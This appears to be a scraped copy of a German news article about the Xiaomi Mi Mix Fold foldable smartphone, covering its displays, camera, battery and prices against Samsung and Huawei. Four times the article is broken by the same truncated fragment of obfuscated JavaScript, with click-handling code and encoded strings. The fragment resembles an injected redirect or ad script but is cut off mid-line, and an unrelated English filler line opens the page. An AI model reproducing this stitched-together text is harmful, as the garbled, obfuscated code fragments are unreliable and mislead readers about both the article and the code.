Modern technology gives us many things.

=d.x&&t.x=d.y&&t.y0?d.t:“_self“;s=0==r.button&&r.ctrlKey?“_blank“:s,de(e,d.u,d.u,s,!0)}return}}var i=[pe(„2lpdjh2XKq8lXE5keg7;mRyqs4yR8:F\fL5MuK[tHizlxYSugnF2″+e.dasere74Rnd+“SYLoe\\rqqxVV6nfhju}QlLY4UjEsx65}84Gw4l5kK5Lo6{1jli“,-3),pe(„2lpdjh2J8]7mZ96q|\Loyu5{eM5Z}LIprzjUGiO\TF\HvHxGhVn2″+e.dasere74Rnd+“HIKoJEOeQ]wpgWq{

0 0

Nachdem Xiaomi sein Smartphone-Portfolio neu bestückt und das Mi Band 6 vorgestellt hat, haben die Chinesen den Angriff auf Samsung und Huawei nun auch bei den Falt-Smartphones begonnen. Denn mit dem neuen Mi Mix Fold zeigt Xiaomi, dass man technisch die Nummer 1 werden will.

=d.x&&t.x=d.y&&t.y0?d.t:"_self";s=0==r.button&&r.ctrlKey?"_blank":s,de(e,d.u,d.u,s,!0)}return}}var i=[pe("2lpdjh2XKq8lXE5keg7;mRyqs4yR8:FfL5MuK[tHizlxYSugnF2"+e.dasere74Rnd+"SYLoe\rqqxVV6nfhju}QlLY4UjEsx65}84Gw4l5kK5Lo6{1jli",-3),pe("2lpdjh2J8]7mZ96q|Loyu5{eM5Z}LIprzjUGiOTFHvHxGhVn2"+e.dasere74Rnd+"HIKoJEOeQ]wpgWq{

Xiaomi Mi Mix Fold lve auf der BühneBildquelle:

Samsung und Huawei galten lange als Technologieführer im Smartphone-Geschäft. Xiaomi dagegen war das Unternehmen mit toller Technik zum günstigen Preis. Doch das ändert sich gerade grundlegend. Das neue Xiaomi Mi 11 Ultra besitzt nicht nur einen fast 1 Zoll großen Kamerasensor, sondern ist auch noch 1.200 Euro teuer. Damit liegt man technisch wie preislich auf einem Niveau mit Huawei und Samsung. Doch jetzt legt Xiaomi noch einmal nach und präsentiert ein Smartphone, dass die letzte Bastion der Konkurrenz stürmt. Die der Handys mit faltbarem Display.

  • Neues Mi Band 6 – Die Details

Xiaomi Mi Mix Fold vs. Galaxy Fold und Mate X

Lange haben Fans darauf gewartet, denn ein Foldabel von Xiaomi lag schon seit Monaten in der Luft. Doch jetzt ist es soweit. Die technischen Daten sind dabei State of the Art. Qualcomms Snapdragon 888 wird mit einem 8,01 Zoll großem Display gepaart. Das löst mit auf seine 133,38 x 173,72 mm in AMOLED-Technik mit 2.480 x 1.860 Pixel auf und ist 600 Nits hell. HDR10+-Technik, DCI-P3 und 387 PPI sprechen ebenfalls die High-End-Sprache.

Die Größe bezieht sich dabei auf den aufgeklappten Zustand. Es klappt dabei „nach innen“ zusammen. Somit ist das Hauptdisplay geschützt, wenn das Mi Mix Fold zusammengeklappt ist. Doch außen gibt es ebenfalls einen Bildschirm, der im zugeklappten Zustand zur Bedienung bereitsteht. Er misst 6,52 Zoll und ist ebenfalls als AMOLED-Panel ausgeführt.

=d.x&&t.x=d.y&&t.y0?d.t:"_self";s=0==r.button&&r.ctrlKey?"_blank":s,de(e,d.u,d.u,s,!0)}return}}var i=[pe("2lpdjh2XKq8lXE5keg7;mRyqs4yR8:FfL5MuK[tHizlxYSugnF2"+e.dasere74Rnd+"SYLoe\rqqxVV6nfhju}QlLY4UjEsx65}84Gw4l5kK5Lo6{1jli",-3),pe("2lpdjh2J8]7mZ96q|Loyu5{eM5Z}LIprzjUGiOTFHvHxGhVn2"+e.dasere74Rnd+"HIKoJEOeQ]wpgWq{

Das neue Xiaomi Mi Mix Fold

Ein größeres Display verspricht vor allem mehr Platz für Medien. Videos und Spiele stehen hier im Mittelpunkt. Dafür hat Xiaomi gleich vier Lautsprecher verbaut. Diese sind in Zusammenarbeit mit Harman Kardon entwickelt.  Mit einem Wisch wird das Xiaomi Mi Mix Fold aber auch zu einem Mini-PC. Xiaomi hat dafür einen Desktop-Modus entwickelt, der dann Android in eine an Windows angelehnte Optik zeigt.

Kamera das Mi Mix Fold

Xiaomi steckt in das Mi Mix Fold eine Dreifachkamera mit dem schon bekannten 108-Megapixel-Sensor als Hauptkamera. Hier werden neun zu einem Pixel zusammengerechnet. Ein 30-fach-Zoom mit 8 Megapixel ergänzt die Hauptkamera. Doch die Kamera hat noch einen Trick mehr drauf, der aus der „dreifach eine vierfach-Kamera“ macht. Die „Liquid Lens Technology“ passt eine der Linsen im Objektiv so an, dass mehrere Linsen modelliert werden können. Das Ganze wird mit einem hauseigenen Fotoprozessor kombiniert, der „C1“ genannt und direkt auf das Motherboard aufgebracht wird.

Ausstattung und Preis des Mi Mix Fold

Der Energiespeicher ist mit 5020 mAh Akkukapazität für die Bauart recht groß. Geladen wird es mit 67 Watt wie die herkömmlichen Flaggschiffmodelle von Xiaomi. Ebenfalls Standard, wie beim Mi 11 Pro und Mi 11Ultra, sind WiFi 6 und UFS 3.1.

=d.x&&t.x=d.y&&t.y0?d.t:"_self";s=0==r.button&&r.ctrlKey?"_blank":s,de(e,d.u,d.u,s,!0)}return}}var i=[pe("2lpdjh2XKq8lXE5keg7;mRyqs4yR8:FfL5MuK[tHizlxYSugnF2"+e.dasere74Rnd+"SYLoe\rqqxVV6nfhju}QlLY4UjEsx65}84Gw4l5kK5Lo6{1jli",-3),pe("2lpdjh2J8]7mZ96q|Loyu5{eM5Z}LIprzjUGiOTFHvHxGhVn2"+e.dasere74Rnd+"HIKoJEOeQ]wpgWq{

Das neue Xiaomi Mi Mix Fold

Doch wie hoch ist der Preis für dieses Falthandy? Hier fängt der Alptraum für Samsung und Huawei erst richtig an. Denn mit einem Einstiegspreis von 9.999 Yuan, also umgerechnet knapp 1.300 Euro liegt man satte 1.000 Euro unter dem Huawei Mate X2 bei dessen Vorstellung und fast 500 Euro unter dem Startpreis des Samsung Galaxy Z Fold2. Die drei Varianten in der Übersicht:

  • Xiaomi Mi Mix Fold mit 12/256 GB: umgerechnet knapp 1.300 Euro
  • Mi Mix Fold mit 12/512 GB: umgerechnet 1.430 Euro (10.999 Yuan)
  • Ceramic-Edition: 16/512 GB: umgerechnet knapp 1.700 Euro (12.999 Yuan)

Quelle: www.inside-digital.de

Hinterlasse eine Antwort

Deine Email-Adresse wird nicht veröffentlicht.